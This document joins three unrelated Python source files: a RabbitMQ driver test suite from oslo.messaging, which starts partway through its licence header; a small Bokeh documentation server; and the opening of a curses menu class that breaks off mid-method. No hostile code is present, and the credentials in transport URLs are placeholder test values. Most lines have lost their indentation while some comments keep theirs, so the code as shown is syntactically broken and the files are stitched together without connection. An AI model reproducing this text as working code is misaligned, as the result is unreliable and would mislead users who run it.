# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import ssl
import sys
import threading
import time
import uuid
import fixtures
import kombu
import kombu.transport.memory
from oslo_serialization import jsonutils
import testscenarios
import oslo_messaging
from oslo_messaging._drivers import amqpdriver
from oslo_messaging._drivers import common as driver_common
from oslo_messaging._drivers import impl_rabbit as rabbit_driver
from oslo_messaging.exceptions import MessageDeliveryFailure
from oslo_messaging.tests import utils as test_utils
from six.moves import mock
load_tests = testscenarios.load_tests_apply_scenarios
class TestHeartbeat(test_utils.BaseTestCase):
@mock.patch('oslo_messaging._drivers.impl_rabbit.LOG')
@mock.patch('kombu.connection.Connection.heartbeat_check')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'_heartbeat_supported_and_enabled', return_value=True)
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'ensure_connection')
def _do_test_heartbeat_sent(self, fake_ensure_connection,
fake_heartbeat_support, fake_heartbeat,
fake_logger, heartbeat_side_effect=None,
info=None):
event = threading.Event()
def heartbeat_check(rate=2):
event.set()
if heartbeat_side_effect:
raise heartbeat_side_effect
fake_heartbeat.side_effect = heartbeat_check
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
conn = transport._driver._get_connection()
conn.ensure(method=lambda: True)
event.wait()
conn._heartbeat_stop()
        # check heartbeat has been called
self.assertLess(0, fake_heartbeat.call_count)
if not heartbeat_side_effect:
self.assertEqual(1, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(0, fake_logger.info.call_count)
else:
self.assertEqual(2, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(1, fake_logger.info.call_count)
self.assertIn(mock.call(info, mock.ANY),
fake_logger.info.mock_calls)
def test_test_heartbeat_sent_default(self):
self._do_test_heartbeat_sent()
def test_test_heartbeat_sent_connection_fail(self):
self._do_test_heartbeat_sent(
heartbeat_side_effect=kombu.exceptions.OperationalError,
info='A recoverable connection/channel error occurred, '
'trying to reconnect: %s')
class TestRabbitQos(test_utils.BaseTestCase):
def connection_with(self, prefetch, purpose):
self.config(rabbit_qos_prefetch_count=prefetch,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
transport._driver._get_connection(purpose)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_sent_on_listen_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_called_once_with(0, 1, False)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_when_cfg_zero(self, fake_basic_qos):
self.connection_with(prefetch=0, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_not_called()
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_on_send_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_SEND)
fake_basic_qos.assert_not_called()
class TestRabbitDriverLoad(test_utils.BaseTestCase):
scenarios = [
        ('rabbit', dict(transport_url='rabbit://guest:guest@localhost:5672//')),
        ('kombu', dict(transport_url='kombu://guest:guest@localhost:5672//')),
        ('rabbit+memory', dict(transport_url='kombu+memory://'))
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_driver_load(self, fake_ensure, fake_reset):
self.config(heartbeat_timeout_threshold=60,
group='oslo_messaging_rabbit')
self.messaging_conf.transport_url = self.transport_url
transport = oslo_messaging.get_transport(self.conf)
self.addCleanup(transport.cleanup)
driver = transport._driver
self.assertIsInstance(driver, rabbit_driver.RabbitDriver)
class TestRabbitDriverLoadSSL(test_utils.BaseTestCase):
scenarios = [
('no_ssl', dict(options=dict(), expected=False)),
('no_ssl_with_options', dict(options=dict(ssl_version='TLSv1'),
expected=False)),
('just_ssl', dict(options=dict(ssl=True),
expected=True)),
('ssl_with_options', dict(options=dict(ssl=True,
ssl_version='TLSv1',
ssl_key_file='foo',
ssl_cert_file='bar',
ssl_ca_file='foobar'),
expected=dict(ssl_version=3,
keyfile='foo',
certfile='bar',
ca_certs='foobar',
cert_reqs=ssl.CERT_REQUIRED))),
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('kombu.connection.Connection')
def test_driver_load(self, connection_klass, fake_ensure):
self.config(group="oslo_messaging_rabbit", **self.options)
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
connection = transport._driver._get_connection()
connection_klass.assert_called_once_with(
'memory:///', transport_options={
'client_properties': {
'capabilities': {
'connection.blocked': True,
'consumer_cancel_notify': True,
'authentication_failure_close': True,
},
'connection_name': connection.name},
'confirm_publish': True,
'on_blocked': mock.ANY,
'on_unblocked': mock.ANY},
ssl=self.expected, login_method='AMQPLAIN',
heartbeat=60, failover_strategy='round-robin'
)
class TestRabbitPublisher(test_utils.BaseTestCase):
@mock.patch('kombu.messaging.Producer.publish')
def test_send_with_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key',
timeout=1)
fake_publish.assert_called_with(
'msg', expiration=1,
exchange=exchange_mock,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
routing_key='routing_key')
@mock.patch('kombu.messaging.Producer.publish')
def test_send_no_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key')
fake_publish.assert_called_with(
'msg', expiration=None,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
exchange=exchange_mock,
routing_key='routing_key')
def test_declared_queue_publisher(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
e_passive = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=True)
e_active = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=False)
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
exc = conn.connection.channel_errors[0]
def try_send(exchange):
conn._ensure_publishing(
conn._publish_and_creates_default_queue,
exchange, {}, routing_key='foobar')
with mock.patch('kombu.transport.virtual.Channel.close'):
                # Ensure the exchange does not exist
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Create it
try_send(e_active)
                # Ensure the exchange now exists
try_send(e_passive)
with mock.patch('kombu.messaging.Producer.publish',
side_effect=exc):
with mock.patch('kombu.transport.virtual.Channel.close'):
# Ensure the exchange is already in cache
self.assertIn('foobar', conn._declared_exchanges)
# Reset connection
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Ensure the cache is empty
self.assertEqual(0, len(conn._declared_exchanges))
try_send(e_active)
self.assertIn('foobar', conn._declared_exchanges)
def test_send_exception_remap(self):
bad_exc = Exception("Non-oslo.messaging exception")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
with mock.patch('kombu.messaging.Producer.publish',
side_effect=bad_exc):
self.assertRaises(MessageDeliveryFailure,
conn._ensure_publishing,
conn._publish, exchange_mock, 'msg')
class TestRabbitConsume(test_utils.BaseTestCase):
def test_consume_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
deadline = time.time() + 6
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
            # the kombu memory transport doesn't really raise errors,
            # so just simulate a real driver's behavior
conn.connection.connection.recoverable_channel_errors = (IOError,)
conn.declare_fanout_consumer("notif.info", lambda msg: True)
with mock.patch('kombu.connection.Connection.drain_events',
side_effect=IOError):
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
self.assertEqual(0, int(deadline - time.time()))
def test_consume_from_missing_queue(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
conn.connection.connection.recoverable_connection_errors = ()
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
                # Ensure that a queue will be re-declared if the consume method
                # of kombu.Queue raises amqp.NotFound
conn.consume()
self.assertEqual(2, declare.call_count)
def test_consume_from_missing_queue_with_io_error_on_redeclaration(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
declare.side_effect = [IOError, None]
conn.connection.connection.recoverable_connection_errors = (
IOError,)
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
                # Ensure that a queue will be re-declared after a
                # 'queue not found' exception despite the connection error.
conn.consume()
self.assertEqual(3, declare.call_count)
def test_connection_ack_have_disconnected_kombu_connection(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
channel = conn.connection.channel
with mock.patch('kombu.connection.Connection.connected',
new_callable=mock.PropertyMock,
return_value=False):
self.assertRaises(driver_common.Timeout,
conn.connection.consume, timeout=0.01)
            # Ensure a new channel has been set up
self.assertNotEqual(channel, conn.connection.channel)
class TestRabbitTransportURL(test_utils.BaseTestCase):
scenarios = [
('none', dict(url=None,
expected=["amqp://guest:guest@localhost:5672/"])),
('memory', dict(url='kombu+memory:////',
expected=["memory:///"])),
('empty',
dict(url='rabbit:///',
expected=['amqp://guest:guest@localhost:5672/'])),
('localhost',
dict(url='rabbit://localhost/',
expected=['amqp://:@localhost:5672/'])),
('virtual_host',
dict(url='rabbit:///vhost',
expected=['amqp://guest:guest@localhost:5672/vhost'])),
('no_creds',
dict(url='rabbit://host/virtual_host',
expected=['amqp://:@host:5672/virtual_host'])),
('no_port',
dict(url='rabbit://user:password@host/virtual_host',
expected=['amqp://user:password@host:5672/virtual_host'])),
('full_url',
dict(url='rabbit://user:password@host:10/virtual_host',
expected=['amqp://user:password@host:10/virtual_host'])),
('full_two_url',
dict(url='rabbit://user:password@host:10,'
'user2:password2@host2:12/virtual_host',
expected=["amqp://user:password@host:10/virtual_host",
"amqp://user2:password2@host2:12/virtual_host"]
)),
('rabbit_ipv6',
dict(url='rabbit://u:p@[fd00:beef:dead:55::133]:10/vhost',
expected=['amqp://u:p@[fd00:beef:dead:55::133]:10/vhost'])),
('rabbit_ipv4',
dict(url='rabbit://user:password@10.20.30.40:10/vhost',
expected=['amqp://user:password@10.20.30.40:10/vhost'])),
]
def setUp(self):
super(TestRabbitTransportURL, self).setUp()
        self.messaging_conf.transport_url = 'rabbit://'
self.config(heartbeat_timeout_threshold=0,
group='oslo_messaging_rabbit')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_transport_url(self, fake_reset, fake_ensure):
transport = oslo_messaging.get_transport(self.conf, self.url)
self.addCleanup(transport.cleanup)
driver = transport._driver
urls = driver._get_connection()._url.split(";")
self.assertEqual(sorted(self.expected), sorted(urls))
class TestSendReceive(test_utils.BaseTestCase):
_n_senders = [
('single_sender', dict(n_senders=1)),
('multiple_senders', dict(n_senders=10)),
]
_context = [
('empty_context', dict(ctxt={})),
('with_context', dict(ctxt={'user': 'mark'})),
]
_reply = [
('rx_id', dict(rx_id=True, reply=None)),
('none', dict(rx_id=False, reply=None)),
('empty_list', dict(rx_id=False, reply=[])),
('empty_dict', dict(rx_id=False, reply={})),
('false', dict(rx_id=False, reply=False)),
('zero', dict(rx_id=False, reply=0)),
]
_failure = [
('success', dict(failure=False)),
('failure', dict(failure=True, expected=False)),
('expected_failure', dict(failure=True, expected=True)),
]
_timeout = [
('no_timeout', dict(timeout=None, call_monitor_timeout=None)),
('timeout', dict(timeout=0.01, # FIXME(markmc): timeout=0 is broken?
call_monitor_timeout=None)),
('call_monitor_timeout', dict(timeout=0.01,
call_monitor_timeout=0.02)),
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._n_senders,
cls._context,
cls._reply,
cls._failure,
cls._timeout)
def test_send_receive(self):
self.config(kombu_missing_consumer_retry_timeout=0.5,
group="oslo_messaging_rabbit")
self.config(heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
# FIXME(danms): Surely this is not the right way to do this...
self.ctxt['client_timeout'] = self.call_monitor_timeout
def send_and_wait_for_reply(i):
try:
timeout = self.timeout
cm_timeout = self.call_monitor_timeout
replies.append(driver.send(target,
self.ctxt,
{'tx_id': i},
wait_for_reply=True,
timeout=timeout,
call_monitor_timeout=cm_timeout))
self.assertFalse(self.failure)
self.assertIsNone(self.timeout)
except (ZeroDivisionError, oslo_messaging.MessagingTimeout) as e:
replies.append(e)
self.assertTrue(self.failure or self.timeout is not None)
while len(senders) < self.n_senders:
senders.append(threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), )))
for i in range(len(senders)):
senders[i].start()
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.ctxt, received.ctxt)
self.assertEqual({'tx_id': i}, received.message)
msgs.append(received)
# reply in reverse, except reply to the first guy second from last
order = list(range(len(senders) - 1, -1, -1))
if len(order) > 1:
order[-1], order[-2] = order[-2], order[-1]
for i in order:
if self.timeout is None:
if self.failure:
try:
raise ZeroDivisionError
except Exception:
failure = sys.exc_info()
msgs[i].reply(failure=failure)
elif self.rx_id:
msgs[i].reply({'rx_id': i})
else:
msgs[i].reply(self.reply)
senders[i].join()
self.assertEqual(len(senders), len(replies))
for i, reply in enumerate(replies):
if self.timeout is not None:
self.assertIsInstance(reply, oslo_messaging.MessagingTimeout)
elif self.failure:
self.assertIsInstance(reply, ZeroDivisionError)
elif self.rx_id:
self.assertEqual({'rx_id': order[i]}, reply)
else:
self.assertEqual(self.reply, reply)
TestSendReceive.generate_scenarios()
class TestPollAsync(test_utils.BaseTestCase):
def test_poll_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
received = listener.poll(timeout=0.050)
self.assertEqual([], received)
class TestRacyWaitForReply(test_utils.BaseTestCase):
def test_send_receive(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
wait_conditions = []
orig_reply_waiter = amqpdriver.ReplyWaiter.wait
def reply_waiter(self, msg_id, timeout, call_monitor_timeout):
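            # Wrap ReplyWaiter.wait so the first sender blocks here until the
            # test notifies it, letting its reply be queued by another thread
            # before it ever starts waiting (the "racy" case under test).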
if wait_conditions:
cond = wait_conditions.pop()
with cond:
cond.notify()
with cond:
cond.wait()
return orig_reply_waiter(self, msg_id, timeout,
call_monitor_timeout)
self.useFixture(fixtures.MockPatchObject(
amqpdriver.ReplyWaiter, 'wait', reply_waiter))
def send_and_wait_for_reply(i, wait_for_reply):
replies.append(driver.send(target,
{},
{'tx_id': i},
wait_for_reply=wait_for_reply,
timeout=None))
while len(senders) < 2:
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), True))
t.daemon = True
senders.append(t)
        # test the case when msg_id is not set
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), False))
t.daemon = True
senders.append(t)
# Start the first guy, receive his message, but delay his polling
notify_condition = threading.Condition()
wait_conditions.append(notify_condition)
with notify_condition:
senders[0].start()
notify_condition.wait()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 0}, msgs[-1].message)
# Start the second guy, receive his message
senders[1].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 1}, msgs[-1].message)
# Reply to both in order, making the second thread queue
# the reply meant for the first thread
msgs[0].reply({'rx_id': 0})
msgs[1].reply({'rx_id': 1})
# Wait for the second thread to finish
senders[1].join()
# Start the 3rd guy, receive his message
senders[2].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 2}, msgs[-1].message)
# Verify the _send_reply was not invoked by driver:
with mock.patch.object(msgs[2], '_send_reply') as method:
msgs[2].reply({'rx_id': 2})
self.assertEqual(0, method.call_count)
# Wait for the 3rd thread to finish
senders[2].join()
# Let the first thread continue
with notify_condition:
notify_condition.notify()
# Wait for the first thread to finish
senders[0].join()
# Verify replies were received out of order
self.assertEqual(len(senders), len(replies))
self.assertEqual({'rx_id': 1}, replies[0])
self.assertIsNone(replies[1])
self.assertEqual({'rx_id': 0}, replies[2])
def _declare_queue(target):
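    # Helper for the wire-format tests: declares the same exchange/queue the
    # driver would use for the given target (fanout, server-specific topic, or
    # plain topic) so the test can consume the raw message off the broker.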
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
queue = kombu.entity.Queue(name=target.topic + '_fanout_12345',
channel=channel,
exchange=exchange,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
queue = kombu.entity.Queue(name=topic,
channel=channel,
exchange=exchange,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
queue = kombu.entity.Queue(name=target.topic,
channel=channel,
exchange=exchange,
routing_key=target.topic)
queue.declare()
return connection, channel, queue
class TestRequestWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': datetime.datetime(1920, 2, 3, 4, 5, 6, 7)}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={})),
('user_project_ctxt',
dict(ctxt={'user': 'mark', 'project': 'snarkybunch'},
expected_ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def setUp(self):
super(TestRequestWireFormat, self).setUp()
self.uuids = []
self.orig_uuid4 = uuid.uuid4
self.useFixture(fixtures.MonkeyPatch('uuid.uuid4', self.mock_uuid4))
def mock_uuid4(self):
self.uuids.append(self.orig_uuid4())
return self.uuids[-1]
def test_request_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
connection, channel, queue = _declare_queue(target)
self.addCleanup(connection.release)
driver.send(target, self.ctxt, self.msg)
msgs = []
def callback(msg):
msg = channel.message_to_python(msg)
msg.ack()
msgs.append(msg.payload)
queue.consume(callback=callback,
consumer_tag='1',
nowait=False)
connection.drain_events()
self.assertEqual(1, len(msgs))
self.assertIn('oslo.message', msgs[0])
received = msgs[0]
received['oslo.message'] = jsonutils.loads(received['oslo.message'])
# FIXME(markmc): add _msg_id and _reply_q check
expected_msg = {
'_unique_id': self.uuids[0].hex,
}
expected_msg.update(self.expected)
expected_msg.update(self.expected_ctxt)
expected = {
'oslo.version': '2.0',
'oslo.message': expected_msg,
}
self.assertEqual(expected, received)
TestRequestWireFormat.generate_scenarios()
def _create_producer(target):
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
return connection, producer
class TestReplyWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': '1920-02-03T04:05:06.000007'}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={'client_timeout': None})),
('user_project_ctxt',
dict(ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'},
expected_ctxt={'user': 'mark', 'project': 'snarkybunch',
'client_timeout': None})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def test_reply_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
listener = driver.listen(target, None, None)._poll_style_listener
connection, producer = _create_producer(target)
self.addCleanup(connection.release)
msg = {
'oslo.version': '2.0',
'oslo.message': {}
}
msg['oslo.message'].update(self.msg)
msg['oslo.message'].update(self.ctxt)
msg['oslo.message'].update({
'_msg_id': uuid.uuid4().hex,
'_unique_id': uuid.uuid4().hex,
'_reply_q': 'reply_' + uuid.uuid4().hex,
'_timeout': None,
})
msg['oslo.message'] = jsonutils.dumps(msg['oslo.message'])
producer.publish(msg)
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.expected_ctxt, received.ctxt)
self.assertEqual(self.expected, received.message)
TestReplyWireFormat.generate_scenarios()
class RpcKombuHATestCase(test_utils.BaseTestCase):
def setUp(self):
super(RpcKombuHATestCase, self).setUp()
        transport_url = 'rabbit://host1,host2,host3,host4,host5/'
self.messaging_conf.transport_url = transport_url
self.config(rabbit_retry_interval=0.01,
rabbit_retry_backoff=0.01,
kombu_reconnect_delay=0,
heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connection'))
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.channel'))
# starting from the first broker in the list
url = oslo_messaging.TransportURL.parse(self.conf, None)
self.connection = rabbit_driver.Connection(self.conf, url,
driver_common.PURPOSE_SEND)
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connect'))
self.addCleanup(self.connection.close)
def test_ensure_four_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=4)
self.assertEqual(6, mock_callback.call_count)
def test_ensure_one_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=1)
self.assertEqual(3, mock_callback.call_count)
def test_ensure_no_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=0)
self.assertEqual(2, mock_callback.call_count)
class ConnectionLockTestCase(test_utils.BaseTestCase):
def _thread(self, lock, sleep, heartbeat=False):
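        # Starts a thread that holds the lock (or its heartbeat side) for
        # `sleep` seconds and returns a callable that joins the thread and
        # reports how long it took to finish, so the tests below can assert
        # the order in which waiters acquired the lock.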
def thread_task():
if heartbeat:
with lock.for_heartbeat():
time.sleep(sleep)
else:
with lock:
time.sleep(sleep)
t = threading.Thread(target=thread_task)
t.daemon = True
t.start()
start = time.time()
def get_elapsed_time():
t.join()
return time.time() - start
return get_elapsed_time
def test_workers_only(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_worker_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1, heartbeat=True)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_workers_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
t3 = self._thread(l, 1)
t4 = self._thread(l, 1, heartbeat=True)
t5 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t4(), places=0)
self.assertAlmostEqual(3, t2(), places=0)
self.assertAlmostEqual(4, t3(), places=0)
self.assertAlmostEqual(5, t5(), places=0)
def test_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1, heartbeat=True)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
|
docserver.py
|
from __future__ import print_function
import flask
import os
import threading
import time
import webbrowser
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
"""this is a simple server to facilitate developing the docs. by
serving up static files from this server, we avoid the need to use a
symlink.
"""
@app.route('/')
def welcome():
return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/"), filename)
def open_browser():
    # Runs in a separate thread; give the server a moment to start first
time.sleep(0.5)
    webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new=2)  # new=2 requests a new browser tab
def serve_http():
http_server.listen(PORT)
IOLoop.instance().start()
def shutdown_server():
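    # IOLoop.add_callback is the thread-safe way to schedule work on the loop
    # from another thread, so the server thread can be stopped cleanly from
    # the main thread.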
ioloop = IOLoop.instance()
ioloop.add_callback(ioloop.stop)
print("Asked Server to shut down.")
def ui():
time.sleep(0.5)
input("Press <ENTER> to exit...\n")
if __name__ == "__main__":
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
|
menu_screen.py
|
import curses
import math
import os
import traceback
import threading
import time
import random
import getpass
import json
import sqlite3
import string
import re
import completer
import datetime
class CursedMenu(object):
#TODO: name your plant
'''A class which abstracts the horrors of building a curses-based menu system'''
def __init__(self, this_plant, this_data):
'''Initialization'''
self.initialized = False
self.screen = curses.initscr()
curses.noecho()
curses.raw()
if curses.has_colors():
curses.start_color()
try:
curses.curs_set(0)
except curses.error:
# Not all terminals support this functionality.
            # When the error is ignored the screen will look a little uglier, but that's not terrible.
